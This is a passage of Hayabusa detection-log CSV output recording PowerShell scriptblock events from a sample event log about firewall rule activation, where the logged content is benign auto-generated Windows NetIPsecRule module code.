($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 